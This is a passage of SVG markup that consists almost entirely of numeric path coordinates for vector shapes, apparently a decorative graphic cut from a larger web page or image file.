4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n        <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n        <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n        <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n        <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n        <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n        <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n        <path 